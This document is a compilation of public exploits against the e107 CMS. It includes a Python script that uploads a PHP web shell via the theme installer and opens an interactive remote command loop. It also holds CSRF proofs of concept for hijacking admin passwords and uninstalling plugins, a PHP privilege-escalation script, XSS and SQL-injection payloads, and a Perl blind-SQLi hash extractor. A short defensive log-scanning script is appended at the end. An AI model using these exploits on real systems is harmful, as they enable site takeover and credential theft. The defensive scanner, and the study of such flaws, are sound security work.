	print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	host(args)



def host(args):
	#Check http or https
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
		sleep(2)
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass
	else:
		print("\n[?] Check Adress...\n")
		sleep(2)
		args.host = "http://" + args.host
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass


	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code != 200:
			print("[-] Address not reachable!")
			sleep(2)
			exit(1)
		else:
			check(args)

	except requests.ConnectionError as exception:
		print("[-] Address not reachable!")
		sleep(2)
		exit(1)



def check(args):
	response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami")
	if response.status_code == 200:
		print("[*] Exploit File Exists!\n")
		sleep(2)
		exploit(args)
	else:
		login(args)



def login(args):
	url = args.host + "/e107_admin/admin.php"
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "application/x-www-form-urlencoded",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/e107_admin/admin.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"}
	response = requests.post(url, headers=headers, data=data, allow_redirects=False)
	new_cookie = response.cookies.get("MySi_cookieSID")
	if (response.headers.get("Location") == "admin.php?failed"):
		print("[-] Login Failed...\n")
		print("Your username or password is incorrect.")
		sleep(2)
		exit(1)
	else:
		print("[+] Success Login...\n")
		sleep(2)
		install(args, new_cookie)



def install(args, new_cookie):
	url = args.host + "/e107_admin/theme.php"
	cookies = {
		"MySi_cookieSID": new_cookie,
		"e107_tzOffset": "-180"}
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload",
		"Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n"
	response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

	if (response.status_code == 301):
		print("[!] Unauthorized user!\n\n")
		print("Requires user with add theme permissions.")
		sleep(2)
		exit(1)
	else:
		print("[!] Upload Vuln File!\n")
		sleep(2)
		exploit(args)



def exploit(args):
	print("[+] Exploit Done!\n")
	sleep(2)

	while True:
		cmd = input("$ ")
		url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd
		headers = {
			"Upgrade-Insecure-Requests": "1",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
		}

		response = requests.post(url, headers=headers, timeout=5)

		if response.text == "":
			print(cmd + ": command not found\n")
		else:
			print(response.text)

if __name__ == '__main__':
	main()
            
# Exploit Title: e107 CMS 2.3.0 - CSRF
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885

CSRF vulnerability on e107 CMS

## Bug Description
Hi. I found a CSRF on the e107 CMS. A hacker can change the password of any user who clicks the link.

## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF login POC using the following code.

```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 2;
    var i=0;

    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}

</script>

<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>

<form method="POST" name="form0" action="http://localhost/[path-to-e107-cms]/usersettings.php">

<input type="hidden" name="loginname" value="admin"/>
<input type="hidden" name="email" value="[email]"/>
<input type="hidden" name="password1" value="[password]"/>
<input type="hidden" name="password2" value="[password]"/>
<input type="hidden" name="hideemail" value="1"/>
<input type="hidden" name="image" value=""/>
<input type="hidden" name="signature" value=""/>
<input type="hidden" name="updatesettings" value="Save settings"/>
<input type="hidden" name="_uid" value="2"/>

</form>

</body>
</html>
```


2. Replace the email and password with the valid credentials.
3. Send the link to the victim (admin) and get them to click it.
4. Log in with the new admin password.
            
<!--
==========================
Title: Multiple CSRF vulnerabilities in e107 CMS 2.1.4
Author:Zhiyang Zeng

Product:
—————
e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
—————

Fix
—————
Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
—————

Summary
————
e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin installing, meta changing and settings changing; a malicious web page can use
forged requests to make e107 download and install a plug-in provided by the attacker.
————

Timeline
———
2017-03-01   report to vendor
2017-03-02  GitHub commit to fix token missing
———

Reproduce:
==========
I just give a PoC that uninstalls any plugin.

Vulnerable address: http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php

POC:
-->

<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
<input type="text" name="delete_tables" value="1">
<input type="text" name="delete_ipool" value="1">
<input type="text" name="delete_files" value="0">
<input type="text" name="uninstall_confirm" value="Confirm uninstall">
<input type="submit" name="submit">
</form>

<!--
Description:
I try to uninstall the gallery plugin, whose id is 8.

After visiting the above PoC page, you will find the gallery plugin has been uninstalled successfully!
===========
-->
            
# Exploit Title: e107 CMS 2.1.2 Privilege Escalation
# Date: 09-11-2016
# Software Link: http://e107.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

Data from `$_POST['updated_data']` inside `usersettings.php` is not properly validated, so `user_admin` can be set by a standard user.

http://security.szurek.pl/e107-cms-211-privilege-escalation.html

2. Proof of Concept

<?php

/**
 * e107 CMS 2.1.2 Privilege Escalation
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $login, $pass, $cookie){

	// CURLOPT_COOKIEJAR takes a file path, not a file handle; curl writes the
	// received session cookie there and reuses it for the second request.
	$ckfile = dirname(__FILE__) . $cookie;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $ckfile);
	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' => $login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
	curl_setopt($ch, CURLOPT_POST, 1);
	$content = curl_exec($ch);
	if (strpos($content, '?logout') === false) {
		die("Cannot login");
	}

	$data = array();
	$data['user_admin'] = 1;
	$data['user_perms'] = 0;
	$data['user_password'] = md5($pass);

	curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' => base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)), 'currentpassword' => $pass)));
	$content = curl_exec($ch);

	if (strpos($content, 'Settings updated') === false) {
		die("Exploit probably failed");
	}

	die('OK!');
}

$url = "http://url_here";

// Standard user credentials 
$user = "login_here";
$pass = "password_here";

$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);
            
 _____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / / 
|  /| \ \/ /\____ |  / /  
\ |_/ />  < .___/ /./ /   
 \___//_/\_\\____/ \_/    
                        by bl4ck s3c


# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107 
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
 
# Vulnerability Description:

The CMS user details section is vulnerable to XSS; payloads entered there are executed.

XSS Vulnerability #1:

Go to the update user settings page:

"http://{target-url}/usersettings.php"

Set the Real Name value to:

"><script>alert(String.fromCharCode(88, 83, 83))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========
 
Vulnerability found and advisory written by Ahmet Agar.
 
===========
References:
===========
 
http://www.0x97.info
https://twitter.com/_HacKingZ_
            
source: https://www.securityfocus.com/bid/52821/info

e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

e107 1.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?option=com_flexicontent&view=[Sql] 
            
source: https://www.securityfocus.com/bid/47750/info

e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

e107 0.7.25 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5 
            
source: https://www.securityfocus.com/bid/50339/info

e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input.

An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.

e107 0.7.24 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_config.php?cmd=id 
            
#!/usr/bin/perl
#
#
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
#
# --------------------------------------------------------------------------
# [*] Discovered by staker - staker[at]hotmail[dot]it 
# [*] Discovered on 09/03/2017
# [*] Site Vendor: http://www.e107.org
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#
#
# Description
# -------------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
# not properly sanitizing user-supplied input to the "keyword" POST variable.
# This may allow an attacker to inject or manipulate SQL queries in
# the backend database regardless of php.ini settings.
# -------------------------------------------------------------------------
# SHORT EXPLANATION
# -----------------------------------
# 
# FILE:  "e107_handlers/core_functions.php"
#
# 76. function vartrue(&$val, $default='')                     
# 77. {
# 78.   if (isset($val) && $val) { return $val; } {1} <--- variable is not sanitized before being sent to the MySQL database
# 79.    return $default;
# 80.}
#
# ----------------------------------
#
# FILE: "e107/e107_plugins/pm/pm.php"
#
# 
# 35. if(vartrue($_POST['keyword']))   {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
# 36. {
# 37.   pm_user_lookup();
# 38.}
#
#
#
# 615. function pm_user_lookup()
# 616. {
# 617.  $sql = e107::getDb();
# 618.
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanitized
# 620. if($sql->gen($query))
# 621. {
# 622. echo '[';
# 623  while($row = $sql->fetch())
# 624. {
# 625.   $u[] =  "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
# 626. }
# 627.
# 628.  echo implode(",",$u);
# 629.  echo ']';
# -----------------------------------
#
#
# use your brain..
#
# Greetz to: Warwolfz Crew,
# meh, Dante90, SHADES MASTER and nexen
#
# -- 0gay --
#
# -----------------------------------
# YOUR MOM IS NOT SAFE ANYMORE!!
# CALL HER!!
# -----------------------------------



use strict;
use IO::Socket::INET;
use LWP::UserAgent;

my ($URL,$uid) = @ARGV;
my @chars = (8..122);
my ($i,$ord,$hash) = (1,undef,undef);

if (@ARGV != 2) { usage(); }


$URL = parse::URL($URL);


syswrite (STDOUT,"[-] Crypted Password: ");


for ($i=0;$i<=60;$i++)
{
   foreach $ord (@chars)
   {
      if (e107::Query(sql($i,$ord),$URL) == 666)
      {
         syswrite (STDOUT,chr($ord));
         $hash .= chr($ord);
         last;
      }
      if ($i == 2 and not defined $hash)
      {
         syswrite (STDOUT,"\n[-] Exploit Failed");
         exit;
      }
   }
}

if (length($hash) == 60) {
   die "\n[-] Exploit Successful\n";
}
else {
   die "\n[-] Exploit Failed\n";
}





sub e107::Query 
{
     
      # 1st parameter, sql query
      # 2nd parameter, e107 website	  

	  my ($query,$URL) = @_;
      my $response = undef; 
	  
      my $lwp = new LWP::UserAgent;


      $lwp->default_header('User-Agent' => 'Lynx (textmode)');

      $response = $lwp->post($URL."/pm/",
                            [ 
			     keyword => $query
			    ]) or die $!;


        if ($response->content =~ /caption/) {
		   return 666;
		} 
        else {
           return 0;
        }		   
		 
}


sub parse::URL
{
        my $string = shift @_ || die($!);
         
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
         
        return $string;
 }
 


sub sql
{
      # 1st parameter, substring position (1-based)
      # 2nd parameter, charcode to compare against
      # the e107 userid comes from the global $uid taken from @ARGV

      my ($i,$j,$sql) = (shift,shift,undef);

      $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";

      return $sql;
}





sub e107::Cookies
{

        my ($username,$password) = @_;
        my ($packet,$content);
        
        my $host = "127.0.0.1";   # Valid Host  (insert it manually)
		my $path = "/e107/";      # Valid e107 path (insert it manually)
		
		
		my $data = "username=".$username."&userpass=".$password."&userlogin=Sign+In";
		
		
		my $socket  = new IO::Socket::INET(
                                            PeerAddr => $host,
                                            PeerPort => 80,
                                            Proto    => 'tcp',
                                          ) or die $!;
		
		
		 
        $packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: Lynx (textmode)\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length:".length($data)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet.= $data;
		
        
		$socket->send($packet);
		
		while (<$socket>) {
		  $content .= $_;
		}  
		
		
		if ($content =~ /Set-Cookie: (.+?)/) {
		    return $1;
	    }
        else {
            die("[-] Login Failed..\n");
        }			
		
		
	# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
        # it works without log-in, but if you got some trouble, try to use this one.
        
	# e107::Login('YOUR USERNAME','YOUR PASSWORD');
}		
		
		
sub usage()
{
        print "[*---------------------------------------------------------*]\n".
              "[*  e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit    *]\n".
              "[*---------------------------------------------------------*]\n".
              "[* Usage: perl web.pl [host] [uid]                         *]\n".
              "[*                                                         *]\n".
              "[* Options:                                                *]\n".
              "[* [host] insert a valid host                              *]\n".
              "[* [uid]  insert a userid                                  *]\n".
              "[*---------------------------------------------------------*]\n";
        exit;
}
source: https://www.securityfocus.com/bid/58841/info

e107 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

e107 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS')</script>
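As an added, defender-side example that is not part of either advisory above, the following Python scans access-log lines for the two probe shapes this page documents: the `' AND ASCII(SUBSTRING(...` boolean-blind comparison sent in the `keyword` parameter, and the NUL-byte-split `<script` tag from the XSS entry. The log format (combined-style lines extended with the URL-encoded POST body as a final quoted field), the sample lines and all addresses are constructed assumptions; the point it shows is that signatures must be matched after percent-decoding and NUL stripping, and that repeated blind probes from one source are the real signal.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample lines (not from the original page). The assumed format is a
# combined-style access log with the URL-encoded POST body as a final quoted field.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "POST /e107/pm/ HTTP/1.1" 200 512 "keyword=%27+AND+ASCII(SUBSTRING((SELECT+user_password+FROM+e107_user+WHERE+user_id%3D1)%2C1%2C1))%3D97%23"
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "POST /e107/pm/ HTTP/1.1" 200 512 "keyword=%27+AND+ASCII(SUBSTRING((SELECT+user_password+FROM+e107_user+WHERE+user_id%3D1)%2C1%2C1))%3D98%23"
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /e107_plugins/content/handlers/content_preset.php?%3c%00script%0d%0a%3ealert(1)%3c/script%3e HTTP/1.1" 200 300 "-"
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /e107/article.php?id=8 HTTP/1.1" 200 2000 "-"
"""

QUOTED = re.compile(r'"([^"]*)"')
BLIND_SQLI = re.compile(r"'\s*and\s+ascii\s*\(\s*substring\s*\(")   # matched on lowercased text
SCRIPT_TAG = re.compile(r"<\s*script\b")

def normalize(field: str) -> str:
    """Percent-decode, drop NUL bytes and lowercase, so %3c%00script matches like <script."""
    raw = unquote_to_bytes(field.replace("+", " "))
    return raw.replace(b"\x00", b"").decode("latin-1").lower()

def classify(line: str) -> list[str]:
    """Tag one log line; every quoted field (request line and body) is inspected."""
    text = " ".join(normalize(f) for f in QUOTED.findall(line))
    tags = []
    if BLIND_SQLI.search(text):
        tags.append("blind_sqli_probe")
    if SCRIPT_TAG.search(text):
        tags.append("xss_probe")
    return tags

def scan(log_text: str, probe_threshold: int = 2) -> dict:
    """Per-source-IP findings; boolean-blind extraction needs many requests per
    character, so repeated probes from one IP are escalated to enumeration."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        ip = line.split(" ", 1)[0]
        for tag in classify(line):
            per_ip[ip][tag] += 1
    findings = {}
    for ip, counts in per_ip.items():
        tags = set(counts)
        if counts.get("blind_sqli_probe", 0) >= probe_threshold:
            tags.add("blind_sqli_enumeration")
        findings[ip] = sorted(tags)
    return findings
```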